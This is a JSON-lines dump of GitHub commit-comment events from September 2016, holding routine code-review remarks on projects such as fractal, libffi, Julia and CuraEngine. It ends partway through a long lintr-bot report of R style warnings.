{"id":"4561317892","type":"CommitCommentEvent","actor":{"login":"cybd"},"repo":{"name":"thephpleague/fractal"},"payload":{"comment":{"id":19017042,"position":66,"line":133,"path":"src/Serializer/JsonApiSerializer.php","commit_id":"d83e869f80c13fe2aeecf0b727ee8522e44820b9","created_at":"2016-09-14T11:15:30Z","updated_at":"2016-09-14T11:15:30Z","body":"What if 'links' index is undefined?"}},"created_at":"2016-09-14T11:15:30Z"}
{"id":"4561318944","type":"CommitCommentEvent","actor":{"login":"claziss"},"repo":{"name":"dr-hannibal/libffi"},"payload":{"comment":{"id":19017046,"position":37,"line":77,"path":"src/arc/arcompact.S","commit_id":"4b45c8a352cc8c0432776e4e591560710bacd773","created_at":"2016-09-14T11:15:44Z","updated_at":"2016-09-14T11:15:44Z","body":".cfi_restore 12"}},"created_at":"2016-09-14T11:15:44Z"}
{"id":"4561319611","type":"CommitCommentEvent","actor":{"login":"CaueP"},"repo":{"name":"CaueP/Splitter"},"payload":{"comment":{"id":19017048,"position":null,"line":null,"path":null,"commit_id":"35c0cdf75bb350f25c2bd65b50f3784ec4ffae2b","created_at":"2016-09-14T11:15:56Z","updated_at":"2016-09-14T11:15:56Z","body":"Adendo: foi adicionado um novo strings.xml para a tradução dos textos para a lingua portuguesa."}},"created_at":"2016-09-14T11:15:56Z"}
{"id":"4561319750","type":"CommitCommentEvent","actor":{"login":"claziss"},"repo":{"name":"dr-hannibal/libffi"},"payload":{"comment":{"id":19017049,"position":39,"line":79,"path":"src/arc/arcompact.S","commit_id":"4b45c8a352cc8c0432776e4e591560710bacd773","created_at":"2016-09-14T11:15:58Z","updated_at":"2016-09-14T11:15:58Z","body":".cfi_restore 11"}},"created_at":"2016-09-14T11:15:58Z"}
{"id":"4561321210","type":"CommitCommentEvent","actor":{"login":"KristofferC"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19017052,"position":null,"line":null,"path":null,"commit_id":"30bf89f3d8e564b588b8e48993e92a551b384f2c","created_at":"2016-09-14T11:16:19Z","updated_at":"2016-09-14T11:16:19Z","body":"Don't think this touches indexing and I have seen the sparse index benchmarks to be a bit noisy so it is most likely fine."}},"created_at":"2016-09-14T11:16:19Z"}
{"id":"4561323917","type":"CommitCommentEvent","actor":{"login":"cooltechu"},"repo":{"name":"cooltechu/py"},"payload":{"comment":{"id":19017059,"position":null,"line":null,"path":null,"commit_id":"25ff7dd4a613aa46e4f6293fcb690973ef2ba5cf","created_at":"2016-09-14T11:16:59Z","updated_at":"2016-09-14T11:16:59Z","body":"ok here i added one more line "}},"created_at":"2016-09-14T11:16:59Z"}
{"id":"4561323978","type":"CommitCommentEvent","actor":{"login":"uaandrei"},"repo":{"name":"uaandrei/npg"},"payload":{"comment":{"id":19017060,"position":null,"line":null,"path":null,"commit_id":"25857ca84d52efe5cd19680451c3302f40b7e372","created_at":"2016-09-14T11:16:59Z","updated_at":"2016-09-14T11:16:59Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;Q6jyqWJk&#x2F;19-make-a-note-that-not-each-page-needs-to-be-saved\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Make a note that not each page needs to be saved.</a>"}},"created_at":"2016-09-14T11:16:59Z"}
{"id":"4561329617","type":"CommitCommentEvent","actor":{"login":"aslakhellesoy"},"repo":{"name":"cucumber/website"},"payload":{"comment":{"id":19017106,"position":null,"line":null,"path":null,"commit_id":"c4d1f40c5ad0c3e25ed33a39d7cdb48c3239c4bd","created_at":"2016-09-14T11:18:24Z","updated_at":"2016-09-14T11:18:24Z","body":"@theo-england I know it's *really* painful to edit this file, but try to make sure there is a consistent number of spaces in front of the various tags, or the web page will be slightly broken in different ways.\r\n\r\nFor example, always 10 spaces in front of `li.schedule-item` etc."}},"created_at":"2016-09-14T11:18:24Z"}
{"id":"4561330088","type":"CommitCommentEvent","actor":{"login":"raquelalvarezbanos"},"repo":{"name":"mantidproject/mantid"},"payload":{"comment":{"id":19017108,"position":null,"line":null,"path":null,"commit_id":"e74f8abecf9430537a5a0c2c8458b3e577a46b72","created_at":"2016-09-14T11:18:31Z","updated_at":"2016-09-14T11:18:31Z","body":"@PranavBahuguna The above hopefully fixes the problems you were seeing. What I've done is initialize the framework, so that all algorithms are available (in particular `Fit`), and use one of the functions defined in `WorkspaceHelper` that will create a workspace in `dSpacing` for us. With this I am able to run the tests and all of them pass."}},"created_at":"2016-09-14T11:18:31Z"}
{"id":"4561330420","type":"CommitCommentEvent","actor":{"login":"DaveByBox"},"repo":{"name":"DaveByBox/cordova-ios"},"payload":{"comment":{"id":19017110,"position":null,"line":null,"path":null,"commit_id":"2085ab9273befbe1187840c309fd8f4e7ad9ed28","created_at":"2016-09-14T11:18:37Z","updated_at":"2016-09-14T11:18:37Z","body":"After two days of pain I was about to create a pull request with this same change. \r\n\r\nAre you able to advise when this will be included in a release?"}},"created_at":"2016-09-14T11:18:37Z"}
{"id":"4561332544","type":"CommitCommentEvent","actor":{"login":"naomipol"},"repo":{"name":"shulamyt/shareMyBooks"},"payload":{"comment":{"id":19017115,"position":27,"line":26,"path":"server/rest/loanRest.js","commit_id":"8dd1d5fcb743ca589ed78c202c723f5576178fca","created_at":"2016-09-14T11:19:10Z","updated_at":"2016-09-14T11:19:10Z","body":"add function for get list of unaccepted loans by user_id `lender_id`"}},"created_at":"2016-09-14T11:19:10Z"}
{"id":"4561332999","type":"CommitCommentEvent","actor":{"login":"claziss"},"repo":{"name":"dr-hannibal/libffi"},"payload":{"comment":{"id":19017117,"position":null,"line":null,"path":null,"commit_id":"4b45c8a352cc8c0432776e4e591560710bacd773","created_at":"2016-09-14T11:19:16Z","updated_at":"2016-09-14T11:19:16Z","body":"You need to log all the ops with the sp/fp (ffi_closure as well). Not sure about all the constants, but make first the mods and then we will try to test."}},"created_at":"2016-09-14T11:19:16Z"}
{"id":"4561334895","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19017120,"position":15,"line":609,"path":"src/utils/polygon.cpp","commit_id":"62dd1c1575852805db09dfe3ba3b4d277c65521d","created_at":"2016-09-14T11:19:43Z","updated_at":"2016-09-14T11:19:43Z","body":"Empty if statement."}},"created_at":"2016-09-14T11:19:43Z"}
{"id":"4561335365","type":"CommitCommentEvent","actor":{"login":"naomipol"},"repo":{"name":"shulamyt/shareMyBooks"},"payload":{"comment":{"id":19017123,"position":10,"line":14,"path":"server/service/loanService.js","commit_id":"8dd1d5fcb743ca589ed78c202c723f5576178fca","created_at":"2016-09-14T11:19:49Z","updated_at":"2016-09-14T11:19:49Z","body":"This should also update the book as loaned"}},"created_at":"2016-09-14T11:19:49Z"}
{"id":"4561336433","type":"CommitCommentEvent","actor":{"login":"muniyarajA"},"repo":{"name":"muniyarajA/angular-master"},"payload":{"comment":{"id":19017130,"position":null,"line":null,"path":null,"commit_id":"87555b78abe548ed210c79b931d40ba26f3cd1a9","created_at":"2016-09-14T11:20:07Z","updated_at":"2016-09-14T11:20:07Z","body":"Email Validation"}},"created_at":"2016-09-14T11:20:07Z"}
{"id":"4561338416","type":"CommitCommentEvent","actor":{"login":"bmuschko"},"repo":{"name":"gradle-guides/gs-writing-gradle-plugins"},"payload":{"comment":{"id":19017134,"position":null,"line":null,"path":null,"commit_id":"fc7d17fc226534368aa911986ed19a76faec45df","created_at":"2016-09-14T11:20:35Z","updated_at":"2016-09-14T11:20:35Z","body":"Just having a brief look at the guide. A couple of comments from my side:\r\n\r\n- The guide provides very little context on what a plugin is and why I'd use it. Also there's no context on script plugins vs. binary plugins and why I should even use `buildSrc`. What if I just want to write a standalone plugin?\r\n-  I strongly disagree that we should introduce an extension for the very first getting started guide. There's far more to be said about extensions than shown in this guide. IMHO the concept can be a guide by itself.\r\n- I don't think the plugin shown in the example is real-world by any means. I am sure readers will ask themselves: \"OK, I understand how to write a plugin that creates a Hello World task but how do I solve my actual problem with the concept of a plugin\"."}},"created_at":"2016-09-14T11:20:35Z"}
{"id":"4561338650","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19017135,"position":null,"line":null,"path":null,"commit_id":"8ebfd73b887c7d50f45d0a984f69e7db06b5a413","created_at":"2016-09-14T11:20:38Z","updated_at":"2016-09-14T11:20:38Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 994](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13234&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-14T11:20:38Z"}
{"id":"4561339067","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19017137,"position":null,"line":null,"path":null,"commit_id":"9a4dab11fde0a0944e72c3e7e1f157f6a37dabee","created_at":"2016-09-14T11:20:43Z","updated_at":"2016-09-14T11:20:43Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 995](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13238&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-14T11:20:43Z"}
{"id":"4561340061","type":"CommitCommentEvent","actor":{"login":"yohanboniface"},"repo":{"name":"ideascube/ideascube"},"payload":{"comment":{"id":19017140,"position":3,"line":3,"path":"ideascube/templates/ideascube/includes/cards/wikimooc.html","commit_id":"1dbb84f36265fbefdab9bb2c60c7aaa6a5606d2c","created_at":"2016-09-14T11:20:58Z","updated_at":"2016-09-14T11:20:58Z","body":"Will this never be in other languages than French?"}},"created_at":"2016-09-14T11:20:58Z"}
{"id":"4561340504","type":"CommitCommentEvent","actor":{"login":"Mazda--"},"repo":{"name":"DirtyUnicorns/android_packages_apps_Settings"},"payload":{"comment":{"id":19017145,"position":null,"line":null,"path":null,"commit_id":"2cc5f0457adfb02100c3c030badb5b30eeaa2afa","created_at":"2016-09-14T11:21:06Z","updated_at":"2016-09-14T11:21:06Z","body":"Thanks @snak3ater , I'll pull in your improvements this morning :-)"}},"created_at":"2016-09-14T11:21:06Z"}
{"id":"4561342703","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19017160,"position":6,"line":244,"path":"src/utils/linearAlg2D.h","commit_id":"4f073ab23f9129761a37afd01fda427c1cb357a7","created_at":"2016-09-14T11:21:38Z","updated_at":"2016-09-14T11:21:38Z","body":"Not the distance, but the squared distance, by the looks of it."}},"created_at":"2016-09-14T11:21:38Z"}
{"id":"4561343299","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19017162,"position":21,"line":259,"path":"src/utils/linearAlg2D.h","commit_id":"4f073ab23f9129761a37afd01fda427c1cb357a7","created_at":"2016-09-14T11:21:47Z","updated_at":"2016-09-14T11:21:47Z","body":"Implementation in header file."}},"created_at":"2016-09-14T11:21:47Z"}
{"id":"4561346201","type":"CommitCommentEvent","actor":{"login":"yohanboniface"},"repo":{"name":"ideascube/ideascube"},"payload":{"comment":{"id":19017167,"position":1,"line":1,"path":"ideascube/conf/kb_babylab_civ.py","commit_id":"20c6e2d41e0848fddb3ff3829720ab43a71f41a9","created_at":"2016-09-14T11:22:30Z","updated_at":"2016-09-14T11:22:30Z","body":"That's no the correct pattern, it should be `kb_civ_babylab` instead."}},"created_at":"2016-09-14T11:22:30Z"}
{"id":"4561348003","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19017173,"position":16,"line":254,"path":"src/utils/linearAlg2D.h","commit_id":"4f073ab23f9129761a37afd01fda427c1cb357a7","created_at":"2016-09-14T11:22:57Z","updated_at":"2016-09-14T11:22:57Z","body":"`vab`? `vap`? What are these names coming from?"}},"created_at":"2016-09-14T11:22:57Z"}
{"id":"4561354656","type":"CommitCommentEvent","actor":{"login":"AdSchellevis"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":19017225,"position":46,"line":46,"path":"src/sbin/opnsense-auth","commit_id":"b90babbfd2425e201c372f631c47019572d0f4ac","created_at":"2016-09-14T11:24:35Z","updated_at":"2016-09-14T11:24:35Z","body":"this should definitely be in devel for some time before releasing to stable. I would first like to switch ssh and console auth (where the request originally came from) and then fix ipsec."}},"created_at":"2016-09-14T11:24:35Z"}
{"id":"4561355830","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19017229,"position":null,"line":null,"path":null,"commit_id":"9b4c2cbe54997ef29e493eef0586a4d32d5b122c","created_at":"2016-09-14T11:24:51Z","updated_at":"2016-09-14T11:24:51Z","body":"[inst/doc/trees_with_root_edge.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/trees_with_root_edge.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:6:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/trees_with_root_edge.R#L6) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:10:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/trees_with_root_edge.R#L10) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 3, fig.height = 3---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:14:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/trees_with_root_edge.R#L14) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 3, fig.height = 3---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:18:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/trees_with_root_edge.R#L18) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 7, fig.height = 7---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:22:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/trees_with_root_edge.R#L22) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:25:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/trees_with_root_edge.R#L25) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:27:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/trees_with_root_edge.R#L27) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_get_average_nltt.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_average_nltt.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:3:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_average_nltt.R#L3) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:9:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_average_nltt.R#L9) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:13:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_average_nltt.R#L13) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:16:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_average_nltt.R#L16) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:19:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_average_nltt.R#L19) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:23:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_average_nltt.R#L23) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:26:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_average_nltt.R#L26) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:29:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_average_nltt.R#L29) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:36:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_average_nltt.R#L36) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:43:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_average_nltt.R#L43) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:46:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_average_nltt.R#L46) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:49:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_average_nltt.R#L49) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:57:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_average_nltt.R#L57) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:61:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_average_nltt.R#L61) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:64:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_average_nltt.R#L64) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:67:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_average_nltt.R#L67) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:71:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_average_nltt.R#L71) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:74:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_average_nltt.R#L74) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:77:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_average_nltt.R#L77) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:84:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_average_nltt.R#L84) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:91:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_average_nltt.R#L91) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:94:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_average_nltt.R#L94) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:100:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_average_nltt.R#L100) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_get_nltt_values.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:8:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L8) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:15:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L15) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:19:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L19) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:22:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L22) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:26:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L26) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:33:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L33) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:37:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L37) *style:* 